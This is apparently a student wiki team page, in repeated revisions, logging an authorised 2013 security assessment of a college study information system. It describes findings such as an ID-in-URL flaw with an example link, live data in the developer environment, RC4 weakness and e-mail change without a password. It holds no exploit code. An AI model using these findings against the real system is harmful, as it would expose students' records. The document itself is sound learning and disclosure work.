* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials section and [[#Final documentation]] section)

'''Problems what we faced:'''

'''Things what we plan to do:'''

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] ''(Made by whole team, structure by Sandra and Jurij)''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] ''(Team Security starts from 18:30)''

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** We made the presentation structure together.
** Googeled a lot :)

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feed-back==
===Feedback from Sten Aus===

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===

Security

2013-04-05T07:00:08Z

Saus: /* Markus Rintamäki */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''

'''Problems what we faced:'''

'''Things what we plan to do:'''

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] ''(Made by whole team, structure by Sandra and Jurij)''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] ''(Team Security starts from 18:30)''

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** We made the presentation structure together.
** Googeled a lot :)

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feed-back==
===Feedback from Sten Aus===

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===

Security

2013-04-05T06:55:14Z

Saus: /* Sten Aus */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
